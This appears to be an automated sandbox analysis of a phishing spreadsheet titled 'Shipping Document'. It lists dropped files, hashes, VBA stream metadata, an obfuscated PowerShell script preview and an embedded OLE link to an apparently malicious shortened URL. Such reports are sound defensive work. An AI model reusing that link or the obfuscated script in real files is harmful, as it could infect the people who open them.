                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                            Malicious:false
                                                            Preview:1
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:very short file (no magic)
                                                            Category:dropped
                                                            Size (bytes):1
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:3:U:U
                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                            Malicious:false
                                                            Preview:1
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:very short file (no magic)
                                                            Category:dropped
                                                            Size (bytes):1
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:3:U:U
                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                            Malicious:false
                                                            Preview:1
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:very short file (no magic)
                                                            Category:dropped
                                                            Size (bytes):1
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:3:U:U
                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                            Malicious:false
                                                            Preview:1
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:very short file (no magic)
                                                            Category:dropped
                                                            Size (bytes):1
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:3:U:U
                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                            Malicious:false
                                                            Preview:1
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:very short file (no magic)
                                                            Category:dropped
                                                            Size (bytes):1
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:3:U:U
                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                            Malicious:false
                                                            Preview:1
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:very short file (no magic)
                                                            Category:dropped
                                                            Size (bytes):1
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:3:U:U
                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                            Malicious:false
                                                            Preview:1
                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):512
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:3::
                                                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                            Malicious:false
                                                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):512
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:3::
                                                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                            Malicious:false
                                                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:Unicode text, UTF-16, little-endian text, with very long lines (432), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):166106
                                                            Entropy (8bit):3.908602670987553
                                                            Encrypted:false
                                                            SSDEEP:3072:Ioqkz3n7kUfLpoPzALJhQ3goqkz3n7kUfLpoPzALJhQ3coqkz3n7kUfLpoPzALJl:IoqgLLGzALPvoqgLLGzALPLoqgLLGzA3
                                                            MD5:FDF1E15A361BAD6618125679A500A319
                                                            SHA1:DC9EFC025B886BFC5E79F8536B6C8FEB49C2A769
                                                            SHA-256:F952118BD2ECCE5A1DFD2884ADA48D397C82956DBF9541CF09AC5BA3E1DA8E56
                                                            SHA-512:DE09D3E36E3A373ECD2467A31B3207E35B159D4FF81DD6D9189EA6374E5849CF03BE22307A0266ADEB8B420E4C5BD50D0CDEAC1DCA9C60408A4ED4B3CEF494A1
                                                            Malicious:true
                                                            Preview:..........r.i.z.S.K.m.b.c.U.U.G.i.K.t.d. .=. .".G.G.B.C.U.h.k.G.l.t.G.b.d.K.o.".....m.L.t.G.q.L.p.g.N.z.d.m.x.o.N. .=. .".c.u.L.e.t.t.R.W.Q.L.c.P.A.A.d.".....H.c.p.c.L.R.m.K.A.L.f.L.W.Q.Z. .=. .".K.O.l.b.U.f.h.L.a.K.t.O.A.k.i.".....m.x.z.e.x.c.b.Z.A.k.f.W.P.A.t. .=. .".H.O.U.k.t.L.P.L.G.A.K.d.P.b.c.".....Z.p.z.c.p.p.L.Z.z.L.c.W.d.p.t. .=. .".g.f.x.L.G.L.A.R.A.W.U.W.i.a.W.".....L.L.o.L.O.o.o.g.P.J.N.W.G.h.L. .=. .".B.U.W.i.G.W.W.G.k.L.N.u.W.G.N.".........W.e.W.L.I.L.t.z.k.i.W.e.Z.W.K. .=. .".x.U.i.K.I.c.G.o.N.n.i.W.W.q.f.".....L.h.K.W.N.C.B.R.d.O.a.e.L.e.L. .=. .".W.i.a.W.i.K.z.d.z.B.d.B.p.P.i.".....P.G.p.u.K.k.S.f.m.N.A.o.W.L.h. .=. .".R.A.f.L.r.p.H.c.m.k.L.W.s.W.U.".........u.K.j.r.z.o.W.n.O.a.W.m.G.W.C. .=. .".k.K.P.I.l.R.C.A.c.G.L.W.L.h.a.".....c.c.o.L.m.U.e.N.c.f.B.f.W.v.o. .=. .".r.P.c.T.N.P.c.i.P.o.L.N.h.q.k.".....u.U.L.B.g.c.a.O.i.s.f.p.L.K.L. .=. .".x.g.W.n.L.k.b.Z.f.U.R.G.O.W.c.".....q.B.s.c.Q.z.i.R.c.o.L.i.j.L.d. .=. .".W.W.t.W.L.I.p.W.c.o.O.P.G.i.G.".....Q.L.r.b.L.K.r.H.L.L.
                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Tue Nov 26 14:49:18 2024, Security: 1
                                                            Category:dropped
                                                            Size (bytes):231424
                                                            Entropy (8bit):7.938179996924936
                                                            Encrypted:false
                                                            SSDEEP:3072:0AhEAdAnia3ma/S6y4U2zOarAEybP9J4pJWjdiI4KcJ7MOqgwVmXhh+bhFVqrorB:0Au6gzK02beJeiIqJqOLShFEt4x7
                                                            MD5:0755B7EF33E2D8E4CFCC8AFA8352D969
                                                            SHA1:813983133CA59DF245F6D571FB6A05556D710448
                                                            SHA-256:546965A13D11285AE31020EA9C4563851CF763CC4CF7E91F15EF07686D3CB1DA
                                                            SHA-512:B32B97B424F6BB2E1B7DBEAACC711BA748F4083896AE8C7531FE2A1B916FF8DCD97DAC34BD8586D3382218CCB635D6065E7A568169E844A866D56858F693707C
                                                            Malicious:false
                                                            Preview:......................>...................................$...................h.......j................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...........&...'.......)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...i.......j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):26
                                                            Entropy (8bit):3.95006375643621
                                                            Encrypted:false
                                                            SSDEEP:3:ggPYV:rPYV
                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                            Malicious:false
                                                            Preview:[ZoneTransfer]....ZoneId=0
                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Tue Nov 26 14:49:18 2024, Security: 1
                                                            Category:dropped
                                                            Size (bytes):231424
                                                            Entropy (8bit):7.938179996924936
                                                            Encrypted:false
                                                            SSDEEP:3072:0AhEAdAnia3ma/S6y4U2zOarAEybP9J4pJWjdiI4KcJ7MOqgwVmXhh+bhFVqrorB:0Au6gzK02beJeiIqJqOLShFEt4x7
                                                            MD5:0755B7EF33E2D8E4CFCC8AFA8352D969
                                                            SHA1:813983133CA59DF245F6D571FB6A05556D710448
                                                            SHA-256:546965A13D11285AE31020EA9C4563851CF763CC4CF7E91F15EF07686D3CB1DA
                                                            SHA-512:B32B97B424F6BB2E1B7DBEAACC711BA748F4083896AE8C7531FE2A1B916FF8DCD97DAC34BD8586D3382218CCB635D6065E7A568169E844A866D56858F693707C
                                                            Malicious:false
                                                            Preview:......................>...................................$...................h.......j................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...........&...'.......)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...i.......j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                            File Type:data
                                                            Category:modified
                                                            Size (bytes):165
                                                            Entropy (8bit):1.4377382811115937
                                                            Encrypted:false
                                                            SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                                            MD5:797869BB881CFBCDAC2064F92B26E46F
                                                            SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                                            SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                                            SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                                            Malicious:true
                                                            Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                            File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Tue Nov 26 08:28:59 2024, Security: 1
                                                            Entropy (8bit):7.8688847864338625
                                                            TrID:
                                                            • Microsoft Excel sheet (30009/1) 47.99%
                                                            • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                                            • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                                                            File name:Shipping Document.xla.xlsx
                                                            File size:240'640 bytes
                                                            MD5:54649fa2a8306383f72c8d8299a40998
                                                            SHA1:873a48d89b2a2110c2edd79792fc1bdb13105d8d
                                                            SHA256:ed2615dc3a9adfa6b3c4f5257f9497349f0fcca5d17e9c94622bf7af4db68a3b
                                                            SHA512:d9cedc43c4eece48367796f618b1675191d7c970e0c742cfad84e43295854ae44fa5c62c1121bb8d247264e3b6d8bbb61adaa9627da6c7dbf4ccdeeacd9bc22b
                                                            SSDEEP:6144:lAu6v55RblUIF8w+2TFnPQfJiw/EHeVkSFfmmk:TE5Ut2TFofpgeVkS0
                                                            TLSH:8F3412183399D641D2421A78DEC0CAA723B9FDA0AD33875B315C771F113B9E9894BF0A
                                                            File Content Preview:........................>...................................$...................h.......j......................................................................................................................................................................
                                                            Icon Hash:2562ab89a7b7bfbf
                                                            Document Type:OLE
                                                            Number of OLE Files:1
                                                            Has Summary Info:
                                                            Application Name:Microsoft Excel
                                                            Encrypted Document:True
                                                            Contains Word Document Stream:False
                                                            Contains Workbook/Book Stream:True
                                                            Contains PowerPoint Document Stream:False
                                                            Contains Visio Document Stream:False
                                                            Contains ObjectPool Stream:False
                                                            Flash Objects Count:0
                                                            Contains VBA Macros:True
                                                            Code Page:1252
                                                            Author:
                                                            Last Saved By:
                                                            Create Time:2006-09-16 00:00:00
                                                            Last Saved Time:2024-11-26 08:28:59
                                                            Creating Application:Microsoft Excel
                                                            Security:1
                                                            Document Code Page:1252
                                                            Thumbnail Scaling Desired:False
                                                            Contains Dirty Links:False
                                                            Shared Document:False
                                                            Changed Hyperlinks:False
                                                            Application Version:786432
                                                            General
                                                            Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                                                            VBA File Name:Sheet1.cls
                                                            Stream Size:977
                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . n . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                                                            Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 86 d3 ad 6e 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                            Attribute VB_Name = "Sheet1"
                                                            Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                            Attribute VB_GlobalNameSpace = False
                                                            Attribute VB_Creatable = False
                                                            Attribute VB_PredeclaredId = True
                                                            Attribute VB_Exposed = True
                                                            Attribute VB_TemplateDerived = False
                                                            Attribute VB_Customizable = True
                                                            

                                                            General
                                                            Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
                                                            VBA File Name:Sheet2.cls
                                                            Stream Size:977
                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . z . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - . 0
                                                            Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 86 d3 7a d9 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                            Attribute VB_Name = "Sheet2"
                                                            Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                            Attribute VB_GlobalNameSpace = False
                                                            Attribute VB_Creatable = False
                                                            Attribute VB_PredeclaredId = True
                                                            Attribute VB_Exposed = True
                                                            Attribute VB_TemplateDerived = False
                                                            Attribute VB_Customizable = True
                                                            

                                                            General
                                                            Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
                                                            VBA File Name:Sheet3.cls
                                                            Stream Size:977
                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - . 0
                                                            Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 86 d3 dc b5 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                            Attribute VB_Name = "Sheet3"
                                                            Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                            Attribute VB_GlobalNameSpace = False
                                                            Attribute VB_Creatable = False
                                                            Attribute VB_PredeclaredId = True
                                                            Attribute VB_Exposed = True
                                                            Attribute VB_TemplateDerived = False
                                                            Attribute VB_Customizable = True
                                                            

                                                            General
                                                            Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                                                            VBA File Name:ThisWorkbook.cls
                                                            Stream Size:985
                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . _ ^ . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . - .
                                                            Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 86 d3 5f 5e 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                            Attribute VB_Name = "ThisWorkbook"
                                                            Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                                                            Attribute VB_GlobalNameSpace = False
                                                            Attribute VB_Creatable = False
                                                            Attribute VB_PredeclaredId = True
                                                            Attribute VB_Exposed = True
                                                            Attribute VB_TemplateDerived = False
                                                            Attribute VB_Customizable = True
                                                            

                                                            General
                                                            Stream Path:\x1CompObj
                                                            CLSID:
                                                            File Type:data
                                                            Stream Size:114
                                                            Entropy:4.25248375192737
                                                            Base64 Encoded:True
                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                                            Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                            General
                                                            Stream Path:\x5DocumentSummaryInformation
                                                            CLSID:
                                                            File Type:data
                                                            Stream Size:244
                                                            Entropy:2.889430592781307
                                                            Base64 Encoded:False
                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                                                            Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
                                                            General
                                                            Stream Path:\x5SummaryInformation
                                                            CLSID:
                                                            File Type:data
                                                            Stream Size:200
                                                            Entropy:3.2920681057018664
                                                            Base64 Encoded:False
                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . . = ? . . . . . . . . .
                                                            Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
                                                            General
                                                            Stream Path:MBD004A267B/\x1CompObj
                                                            CLSID:
                                                            File Type:data
                                                            Stream Size:99
                                                            Entropy:3.631242196770981
                                                            Base64 Encoded:False
                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
                                                            Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                            General
                                                            Stream Path:MBD004A267B/Package
                                                            CLSID:
                                                            File Type:Microsoft Excel 2007+
                                                            Stream Size:16804
                                                            Entropy:7.59049937623385
                                                            Base64 Encoded:True
                                                            Data ASCII:P K . . . . . . . . . . ! . D . 2 . . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                            Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 44 19 a7 ee 32 01 00 00 c9 02 00 00 13 00 08 02 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 04 02 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                            General
                                                            Stream Path:MBD004A267C/\x1Ole
                                                            CLSID:
                                                            File Type:data
                                                            Stream Size:908
                                                            Entropy:5.086021196979637
                                                            Base64 Encoded:False
                                                            Data ASCII:. . . . ^ b . 4 . . . . . . . . . . . . . v . . . y . . . K . r . . . h . t . t . p . s . : . / . / . l . j . g . . . c . l . / . w . f . U . P . ? . & . a . c . t . i . o . n . = . h . i . s . t . o . r . i . c . a . l . & . r . u . b . b . e . r . = . s . h . r . i . l . l . & . g . a . l . l . o . n . = . c . l . o . u . d . y . & . p . o . c . k . e . t . b . o . o . k . = . i . n . e . x . p . e . n . s . i . v . e . & . j . u . m . p . s . u . i . t . = . n . i . c . e . & . h . e . e . l . . . . _ r
                                                            Data Raw:01 00 00 02 ff 5e 9e 62 cd 94 34 2e 00 00 00 00 00 00 00 00 00 00 00 00 76 01 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b 72 01 00 00 68 00 74 00 74 00 70 00 73 00 3a 00 2f 00 2f 00 6c 00 6a 00 67 00 2e 00 63 00 6c 00 2f 00 77 00 66 00 55 00 50 00 3f 00 26 00 61 00 63 00 74 00 69 00 6f 00 6e 00 3d 00 68 00 69 00 73 00 74 00 6f 00 72 00 69 00 63 00 61 00 6c 00 26 00 72 00
                                                            General
                                                            Stream Path:Workbook
                                                            CLSID:
                                                            File Type:Applesoft BASIC program data, first line number 16
                                                            Stream Size:207228
                                                            Entropy:7.997253318602257
                                                            Base64 Encoded:True
